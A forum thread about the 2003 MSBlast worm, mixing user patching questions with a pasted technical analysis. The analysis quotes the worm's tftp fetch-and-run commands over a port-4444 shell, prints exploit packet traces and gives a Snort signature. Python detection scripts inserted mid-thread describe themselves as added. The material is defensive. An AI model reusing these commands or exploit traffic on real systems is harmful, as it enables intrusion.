msblast.exe WTF?!?!?!?!?!

Well, all things considered, msblast is pretty innocuous as far as worms go. It doesn’t do anything to your computer except use it as a base to infect others. The crashing etc is more a side-effect of this.

So it could be argued that the author has done us a favour by forcing everyone to update their patches before a really nasty virus came along using the same loophole. There’s little doubt that one will. How much worse would this have been if the virus triggered a reformat?

Still, won’t mean he’ll not get what he deserves.

Thanks, neutron star, I will print that out. My IT Boy at work is going to download something for me onto a CD for me to take home, as my computer will only stay on for 30 seconds—It’s all very Mission: Impossible. He’s downloading "http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe."

• When I get home, what do I do with it?

• Do I still have to yank all the cables out of the back of my laptop?

• How will I start the machine? Do I just stick the CD in and click on it and hope the instructions will make sense?

• The Microsoft instructions say "install or update your antivirus signature software" (is that what’s on the CD?). "Then download the worm removal tool from your antivirus vendor" (download the who from the where on the what, then?).

• Will I need anything else to further protect me, or is that included on the above site?

My thoughts exactly, although I would go further and say that we should almost thank whoever wrote this worm. The security vulnerability has been public knowledge since June, but most people, me included, failed to apply the patch until the worm began spreading. I for one am glad to have been warned before nastier variants of it appear.

OK, so I think that I probably had the most inconvenient reformat ever. I wasn’t infected with the worm, and I think I might have actually gotten the patch (I remember getting an email from one of the lists I was on saying to get it now.) But since I reformatted my desktop (on the lappy right now, it’s running 98, so it’s safe) I just want to make sure I do this right.

Once I get XP installed (still doing that right now) I make sure I’m not connected to the internet, turn on XP’s firewall (I think I might actually have a copy of Norton firewall, will that work too? Maybe I’ll do both to be super safe.) Then connect and download patch, after patch is installed I should be safe, right? I mean, since I reformatted it can’t be there when I start, and in theory if I turn on the firewall it can’t get on.

Futile Gesture, there’s the irony. What makes this a nasty virus (albeit subtly nasty) is that as of this Saturday, every infected, unpatched system connected to the internet will attempt to execute a Denial of Service attack against windowsupdate.com. Meaning, after the 16th, if the DoS is successful, no one will be able to patch their systems reliably, unless Microsoft can develop a new distribution vector, and disseminate that new information to all users in a very short timeframe. Considering that there are, at the minimum, 120,000 infected systems, and possibly up to 1 million, at the very least windowsupdate.com will be intermittently knocked offline. And trust me, there are enough people online who will not have a clue what to do and will keep on rebooting their machines and merrily logging on without a thought to fixing the exploit, that this threat will hang around out there for quite a while. It’s not the digital armageddon that many infosec “experts” are always railing about, but it’s certainly a prelude to something worse, IMHO.

[shallow, selfish bastard]
But then again, I work at a security company, so at least our stock will go up.
[/shallow, selfish bastard]
:smiley:

That’s pretty much the same thing my brother said four years ago about the Y2K problem. He made a cubic assload of money selling Y2K upgrade cards.

Okay, so I checked out the Microsoft patch site so I can download it on my home computer when I get home. But I’m not sure which version I need: there seem to be two for Windows XP, “32 bit version” or “64 bit version”. How can I tell which one I have on my computer? (It’s a laptop running XP Home edition).

You need this one Sparrow.

You need 32. AFAIK Home version doesn’t even come in 64 bit.

I don’t think I’ve seen this variation of the problem posted here.

At work, it seems our network has been infected. The big symptom is that IE will not spawn new windows. However, our internet connection is not crashing. Also, something I haven’t seen mentioned–the “search” function under our start menu seems to have been disabled. When you click on it, simply nothing happens.

Also, there is no “msblast.exe” under our processes in our task manager. (running Windows 2000.)

And I just noticed, cut and paste do not work in IE.

So, is this the same worm or not? It happened on the same day so I’m assuming it is. But then, why are the symptoms differing from everyone else’s?

I had your exact same symptoms on my work PC yesterday, except that I was able to see the msblast process running through Task Manager’s “Processes” tab. However, the virus was stopping me from disabling the msblast process.

Someone else in the office downloaded the Windows patch, and IMed it to me. By necessity, I installed the patch before removing msblast files from my system, then cold-booted my computer. After the cold boot, I was able to disable the msblast process, and delete msblast.exe from my C:/WINNT/System32 folder.

My Search for Files & Folders function was restored, so I double checked to make sure I had no files named “msblast” left on my machine. Finally, I went to www.symantec.com, downloaded their freeware msblast-killer program, and ran it. I came up clean at this point, and so far, I am satisfied that I am in the clear.

I hadn’t connected my laptop to the internet in a few weeks, and had been pretty regular with the MS updates, but yesterday after I did connect up, download the patch (though I’m fairly sure I already had it) and run the Symantec check for the virus (finding nothing) I’m no longer able to run auto-updates on any of my programs.

Norton AntiVirus has a button you can click to force a check for updates, rather than wait for the next round of updates, and when I click it, I get a message stating that the program cannot connect to the internet. I am able to manually go to the Symantec website, download the latest virus defs and whatnot, and install them, though.

Spyware, Search & Destroy has a “Check for Updates” button that returns the same failure message.

Ad-aware, same thing- can’t connect to the ‘net.

It’s affecting other programs, too- Semagic (an LJ client) can’t connect, though I have no problems whatsoever surfing the internet.

WTF?

Forgot to add, Frylock – I also run Windows 2000.

Yes. It’s the worm. Sounds very similar to the symptoms I had, which is why I at first didn’t suspect a virus. I think what’s happening is that the virus is trying to infect, but not succeeding. But it’s killing RPC services along the way. All your problems are not caused by the virus directly, but because you lack this service.

Restarting the service manually or rebooting fixes the problem, until the next attack.

So you’re not infected, something about your system is causing the worm to fail. But you are still prone to the effects of the worm’s attempts at infecting from other computers. Apparently it’s not a very clever worm. But this hasn’t stopped it causing a whole lot of trouble.

The solution is the same: apply patches.

I recommend going out and purchasing a Linksys firewall/router if you have a broadband connection. No need for firewall software that conflicts with any programs. I’m assuming that such a firewall will protect against any of these viruses.

Of course, I’m on a Mac, so I don’t think the mblaster will do a whole lot to me.

Using the patch and the worm remover you guys have posted links to, we seem to have eliminated the problem, but we’re keeping our fingers crossed.

Thanks, you guys, for saving us some bucks we could ill-afford to spend right now.

Thanks for all the help posted here.

OK, so I installed the patches from microsoft and the reboot problem seemed to disappear.

Then I installed Symantec’s fix tool and tried to run it, but it wouldn’t run completely. I tried to run it in safe mode, but couldn’t get my safe mode to work (?).

I manually deleted the msblast file in the system32 folder and in the prefetch folder. The file is not listed in my start menu. I enabled the firewall and everything seems to be working OK now. Do I need to do anything else?

Now that Variant Blaster.b has been unearthed it is a matter of time before someone makes a Memory Resident version.

Patch Patch and Patch

Blaster.b seems to only be using a different exe. The name is Penis.exe (if that gets deleted that is to say malegenetaliapropername.exe )
Some Symptoms

  • svchost.exe error message after “spontaneous” reboot
  • copy and paste functions don’t work anymore (file contents, or files themselves)
  • FIND window doesn’t work
  • properties of any event in event viewer

These are the result of failed attempts to exploit the vulnerability. Due to a bug in the worm, this is a side effect of the infection behavior. Once patched, the systems should no longer exhibit these behaviors.

If the Fixtool does not detect W32.Blaster on these systems, AND the OS on these is either NT4 or Windows 2003 Server, then you have to explain to them that that is correct. While W32.Blaster.Worm cannot spread to Windows NT or Windows 2003 Server, unpatched computers running these operating systems may crash as the result of attempts by the worm to exploit them.

Understand?
NT and 2003 are vulnerable but may not aid propagation or be infected.

Questions

Q. Can this particular worm be memory resident like slammer?
A. No, not this worm.

Q. How does it get in? Definitely not email?
A. Network based purely at present. In general, the following ports should be filtered at the network perimeter: TCP/UDP 135, UDP 137, UDP 138, TCP 139, TCP/UDP 445 and TCP 593. In relation to this particular exploit, block access to TCP port 4444 at the firewall level, and then block the following ports, if they do not use the applications listed: TCP Port 135, “DCOM RPC”, UDP Port 69, “TFTP”.
Q. Does the worm propagate using typical uname and pass?
A. An attacker can exploit this vulnerability by crafting a specifically malformed RPC packet and sending it to a vulnerable server. The attacker will need access to the vulnerable server RPC interface that is located at port 135. A malicious attacker may use this vulnerability to execute code of his choice on the victim machine. Since the RPC service executes with SYSTEM privileges, an attacker executing code as the result of this attack can fully compromise the vulnerable server.

Q. Is a reboot required to activate the virus on the machine?
A. A reboot is NOT required for the msblast.exe file to be executed. See below:
“The worm will start a tftp server on the attacking host; this will allow the victim host to download a copy of the worm (msblast.exe) after a successful compromise. The worm will also open a command shell on TCP port 4444 on the victim host, allowing commands to be sent to the infected system. The worm will issue the commands “tftp <host> GET msblast.exe” and “start msblast.exe” over the command shell. The command shell on TCP port 4444 does not remain open after the attacking host disconnects subsequent to issuing its commands.”

Q. What’s the intensity of the network scans?
A. The attacking host will issue 20 simultaneous connect() calls, each going to a unique IP address. The host will then use a select() call to determine which hosts have responded. Upon receiving a response the worm will attempt to exploit the host. Therefore for each infected host, 20 could be potentially attacked.

Q. If it’s propagating by ‘guessed IP addresses’ then can it potentially cause printers to print garbage like bugbear did?
A. It definitely will potentially hit IP-based network printers but the effects it will have are still unclear. The question is, do network printers listen for RPC on port 135? Will update you on this asap.
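To show what the scanning behaviour described in the Q&A above looks like from the defender's side, here is an added Python example (not from this thread, Symantec, or any vendor tool) that reads constructed Snort-style trace lines and flags any source that sends bare SYNs to tcp/135 across a run of consecutive addresses. The log format, the addresses and the thresholds are assumptions for illustration.

```python
import re
from ipaddress import ip_address

# Constructed lines (not a real capture) in the shape of Snort's packet log:
# timestamp, src:port -> dst:port, protocol, TCP flags in the order 12UAPRSF,
# so "******S*" is a bare SYN and "***A****" a bare ACK.
SAMPLE_LOG = """\
08/11-16:56:52.942469 172.16.77.129:1249 -> 62.177.236.1:135 TCP ******S*
08/11-16:56:52.943438 172.16.77.129:1250 -> 62.177.236.2:135 TCP ******S*
08/11-16:56:52.944197 172.16.77.129:1251 -> 62.177.236.3:135 TCP ******S*
08/11-16:56:52.945001 172.16.77.129:1252 -> 62.177.236.4:135 TCP ******S*
08/11-16:56:52.945877 172.16.77.129:1253 -> 62.177.236.5:135 TCP ******S*
08/11-16:56:53.101200 172.16.77.129:1254 -> 62.177.236.6:135 TCP ******S*
08/11-16:56:53.220000 172.16.77.129:1255 -> 62.177.236.7:135 TCP ******S*
08/11-16:56:53.330000 172.16.77.129:1256 -> 62.177.236.8:135 TCP ******S*
08/11-16:56:54.000000 172.16.77.129:1257 -> 62.177.236.9:135 TCP ******S*
08/11-16:56:54.100000 172.16.77.129:1258 -> 62.177.236.10:135 TCP ******S*
08/11-16:56:55.000000 172.16.61.2:3921 -> 172.16.77.129:135 TCP ***A****
08/11-16:56:55.500000 172.16.61.9:4455 -> 172.16.61.1:135 TCP ******S*
08/11-16:56:56.000000 172.16.61.9:4456 -> 172.16.61.40:80 TCP ******S*
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\d+\.\d+\.\d+\.\d+):\d+ -> "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+) TCP (?P<flags>\S+)$"
)

def syn_targets_by_source(log_text, dport=135):
    """Map each source IP to the distinct hosts it sent a bare SYN to on dport."""
    targets = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or int(m["dport"]) != dport:
            continue
        if "S" not in m["flags"] or "A" in m["flags"]:
            continue  # keep the initial SYN only, not SYN/ACK, ACK or data
        targets.setdefault(m["src"], {})[m["dst"]] = None  # dict keeps order, dedups
    return {src: list(dsts) for src, dsts in targets.items()}

def longest_sequential_run(ips):
    """Length of the longest run of numerically consecutive addresses."""
    nums = sorted({int(ip_address(ip)) for ip in ips})
    best = run = 1 if nums else 0
    for prev, cur in zip(nums, nums[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best

def find_rpc_scanners(log_text, min_targets=8, min_run=5):
    """Sources that SYN-scanned tcp/135 across a run of consecutive addresses.

    The worm walks addresses sequentially, 20 connect() calls at a time, so one
    source hitting many consecutive hosts on 135 is the tell-tale; the
    thresholds are assumptions to tune against local traffic.
    """
    hits = []
    for src, dsts in syn_targets_by_source(log_text).items():
        run = longest_sequential_run(dsts)
        if len(dsts) >= min_targets and run >= min_run:
            hits.append({"src": src, "targets": len(dsts), "sequential_run": run})
    return hits
```

On the constructed log only 172.16.77.129 is reported; the single SYN from 172.16.61.9 and the ACK from 172.16.61.2 fall below the thresholds.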

The W32.Blaster worm, which propagates via the Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability, has recently been observed propagating at a notable rate in the wild. The *********** team has obtained a copy of the worm and has conducted an analysis of the binary.

Action Items

The ********* Team encourages network administrators to:

• Ensure that all available patches and feasible mitigating strategies provided in Microsoft Security Bulletin MS03-026 have been applied.
• Ensure that the following ports are filtered at the network perimeter and between all untrusted network segments: udp/135, udp/137, udp/138, tcp/135, tcp/445, tcp/593.
• Deploy the provided Snort signature to assist in the detection of exploitation attempts targeting this issue.

Technical Description

It is known that the W32.Blaster worm attempts to conduct a Denial of Service (DoS) attack against windowsupdate.com during a specific time period. The worm checks to see if the date is later than August 15, and prior to December 31. If these conditions are met, the denial of service attack will be performed.

The DoS attack will also be launched after the 15th of each month that is not in the aforementioned range.

The worm will start a tftp server on the attacking host; this will allow the victim host to download a copy of the worm (msblast.exe) after a successful compromise.

The worm will also open a command shell on TCP port 4444 on the victim host, allowing commands to be sent to the infected system. The worm will issue the commands “tftp <host> GET msblast.exe” and “start msblast.exe” over the command shell. The command shell on TCP port 4444 does not remain open after the attacking host disconnects subsequent to issuing its commands.

The worm can spread via Windows 2000 and XP. It uses two universal offsets, one for each affected operating system.

The following code segment is used to determine the offset used to compromise a vulnerable host. There is an 80% chance that the Windows XP offset will be used and a 20% chance that the Windows 2000 offset will be used for exploitation.

.text:00401496 mov ds:data_whichOffset, 1   ; default: offset 1 (Windows XP)
.text:004014A0 call rand                    ; eax = rand()
.text:004014A5 mov ecx, 10
.text:004014AA cdq                          ; sign-extend eax into edx:eax for the divide
.text:004014AB idiv ecx                     ; edx = rand() % 10
.text:004014AD cmp edx, 7
.text:004014B0 jle short loc_4014BC         ; remainder 0..7 (8 of 10 = 80%): keep the XP offset
.text:004014B2 mov ds:data_whichOffset, 2   ; remainder 8 or 9 (20%): Windows 2000 offset

The worm also carries a payload of encoded shellcode.

The worm adds the following key to the registry upon successful exploitation:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update
This registry key contains the value “msblast.exe”. This is likely to ensure that the worm will run upon system startup.

In order to prevent the worm from being executed multiple times on a single system, the worm creates a mutex lock using the name BILLY.

The attacking host will issue 20 simultaneous connect() calls, each going to a unique IP address. The host will then use a select() call to determine which hosts have responded. Upon receiving a response the worm will attempt to exploit the host.

The worm uses an algorithm based on the current local host IP address to find IP addresses to attack. Given the local host IP address A.B.C.D, ‘D’ is set to zero. If C is greater than 20, a random number (less than 20) is subtracted from C. Once this semi-random IP address has been calculated, the worm will continually increment the IP address, attacking in sequential order. This means the local subnet will become saturated with port 135 requests prior to exiting the local subnet.

Packet Traces

The following packet traces depict scanning for vulnerable machines conducted by the worm:
08/11-16:56:52.942469 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3E 172.16.77.129:1249 -> 62.177.236.1:135 TCP TTL:128 TOS:0x0 ID:23199 IpLen:20 DgmLen:48 DF *****S Seq: 0xD01F7CE9 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-16:56:52.943438 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3E 172.16.77.129:1250 -> 62.177.236.2:135 TCP TTL:128 TOS:0x0 ID:23200 IpLen:20 DgmLen:48 DF *****S Seq: 0xD020129A Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-16:56:52.944197 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3E 172.16.77.129:1251 -> 62.177.236.3:135 TCP TTL:128 TOS:0x0 ID:23201 IpLen:20 DgmLen:48 DF *****S Seq: 0xD020F1CE Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
The following packet trace illustrates an infection attempt against a potential victim:
08/11-15:26:09.095239 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3E 172.16.77.129:4010 -> 172.16.61.2:135 TCP TTL:128 TOS:0x0 ID:13809 IpLen:20 DgmLen:48 DF **S Seq: 0x7B91948D Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:09.095309 0:50:56:C0:0:1 -> 0:C:29:41:1F:13 type:0x800 len:0x3E 172.16.61.2:135 -> 172.16.77.129:4010 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:48 DF AS Seq: 0x378FC8B6 Ack: 0x7B91948E Win: 0x16D0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:09.095923 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3C 172.16.77.129:4010 -> 172.16.61.2:135 TCP TTL:128 TOS:0x0 ID:13810 IpLen:20 DgmLen:40 DF A
Seq: 0x7B91948E Ack: 0x378FC8B7 Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:17.131282 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x7E 172.16.77.129:4010 -> 172.16.61.2:135 TCP TTL:128 TOS:0x0 ID:13856 IpLen:20 DgmLen:112 DF AP Seq: 0x7B91948E Ack: 0x378FC8B7 Win: 0x4470 TcpLen: 20 05 00 0B 03 10 00 00 00 48 00 00 00 7F 00 00 00 …H… D0 16 D0 16 00 00 00 00 01 00 00 00 01 00 01 00 … A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 …F 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 …]… 2B 10 48 60 02 00 00 00 +.H`…
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:17.131320 0:50:56:C0:0:1 -> 0:C:29:41:1F:13 type:0x800 len:0x36 172.16.61.2:135 -> 172.16.77.129:4010 TCP TTL:64 TOS:0x0 ID:30958 IpLen:20 DgmLen:40 DF A
Seq: 0x378FC8B7 Ack: 0x7B9194D6 Win: 0x16D0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:17.132220 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x5EA 172.16.77.129:4010 -> 172.16.61.2:135 TCP TTL:128 TOS:0x0 ID:13857 IpLen:20 DgmLen:1500 DF A
Seq: 0x7B9194D6 Ack: 0x378FC8B7 Win: 0x4470 TcpLen: 20
I have a lot more captures if you need them .

Also if anyone wants the Snorts then let me know
Description of Vulnerabilities
Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability
http://www.securityfocus.com/bid/8205

A buffer overrun vulnerability has been reported in Microsoft Windows that can be exploited remotely via
a DCOM RPC interface that listens on TCP/UDP port 135. The issue is due to insufficient bounds checking
of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious
instructions with Local System privileges on an affected system.

IDS Signatures
Update: There have been reports indicating the included snort signature (see below) fails to properly
detect all worm related traffic. The problem appears to be related to the “flow: established” directive. To
ensure proper detection, organizations may want to remove the “flow: established” directive.
The Threat Analyst Team has created the following Snort signature designed to detect exploitation of the
Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability.
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 \
    (msg:"DCE RPC Interface Buffer Overflow Exploit"; \
    content:"|00 5C 00 5C|"; \
    content:!"|5C|"; within:32; \
    flow:to_server,established; \
    reference:bugtraq,8205; rev:1;)

Based on the analysis of the code found in rpcss.dll and information available in the advisory released by
the Xfocus researchers, it has been determined that an unchecked copy operation into a 32-byte buffer
occurs in function “GetMachineName”. The signature works by identifying NetBIOS names in packets
destined for the RPC ports that are greater than 32 bytes in length. A NetBIOS machine name is
delimited by UNICODE sequences “\” and “”.
False positives may occur if an innocuous string satisfying the above criteria is found in an RPC packet.
The likelihood of this particular combination of characters occurring outside of the scope of NetBIOS
machine names is quite low, and as such the number of false positives is expected to be minimal. False
negatives are not expected.

The following IDS vendors have released signatures to detect exploitation attempts against the Microsoft
Windows DCOM RPC Interface Buffer Overrun Vulnerability.

Mitigating Strategies
Ensure that the following ports are filtered at the network perimeter: TCP/UDP 135, UDP 137, UDP 138,
TCP 139, TCP/UDP 445 and TCP 593.
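As an added example that is not part of the advisory or of Snort itself, the following Python re-implements the matching logic of the signature above (a UTF-16 “\\” sequence followed by no backslash within 32 bytes) over constructed request stubs, so the relation between the 32-byte window and the GetMachineName buffer can be checked directly. The stub layout (a 4-byte character count in front of the UTF-16LE path) is an assumption for illustration, not the real activation-request format.

```python
# Snort "content:|00 5C 00 5C|": the UTF-16LE bytes of "\\" when the byte
# before them is NUL (the high byte of a preceding ASCII character or field).
UNC_PREFIX = b"\x00\x5c\x00\x5c"
# Snort "content:!|5C|; within:32": no backslash may appear in the 32 bytes
# after the previous match; 32 bytes of UTF-16 is 16 characters of name.
WINDOW_BYTES = 32

def rule_matches(payload: bytes) -> bool:
    """Return True if the signature would fire on this payload.

    Snort retries later occurrences of the first content when the negated
    second content fails, so every occurrence is examined, not only the first.
    """
    start = 0
    while True:
        idx = payload.find(UNC_PREFIX, start)
        if idx == -1:
            return False
        after = idx + len(UNC_PREFIX)
        window = payload[after:after + WINDOW_BYTES]
        if b"\x5c" not in window:
            return True  # nothing terminates the machine name inside the window
        start = idx + 1

def make_stub(unc_path: str) -> bytes:
    """Constructed stand-in for a request carrying a UNC path (assumption).

    A 4-byte little-endian character count precedes the NUL-terminated UTF-16LE
    string, in the manner of an NDR conformant string; its zero high bytes
    supply the NUL that the first content pattern needs.
    """
    encoded = unc_path.encode("utf-16-le") + b"\x00\x00"
    count = (len(unc_path) + 1).to_bytes(4, "little")
    return count + encoded

def machine_name(unc_path: str) -> str:
    """The server part of \\\\server\\share."""
    return unc_path.lstrip("\\").split("\\", 1)[0]

def verdict(unc_path: str) -> str:
    """Human-readable result for one constructed request."""
    name = machine_name(unc_path)
    state = "ALERT" if rule_matches(make_stub(unc_path)) else "ok"
    return f"{name} ({len(name)} chars, {2 * len(name)} bytes UTF-16): {state}"

if __name__ == "__main__":
    for path in ("\\\\FILESERVER\\share", "\\\\" + "A" * 15 + "\\C$", "\\\\" + "A" * 16 + "\\C$"):
        print(verdict(path))
```

With this stub layout the rule stays quiet for names of up to 15 characters and fires from 16 characters on, which is where a name plus its terminator no longer fits the 32 bytes the advisory describes.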

I should explain the symptoms

SVCHOST is a services manager for all services requiring a dll pull

So it marshals a number of services, yeah?

One of these is epmap which is the end point map for …guess what…135

SvcHost goes down it brings the rest with it

hmmm…

Thought the formatting was nicer than that :frowning:

I realise that I haven’t explained why NT & 2003 are not affected.

TFTP (Trivial File Transfer Protocol) just ain’t there.

So they can’t talk back to the initial 20 searching IP hits.

This does NOT mean they are not vulnerable to the 135 overflow though. They should still be patched.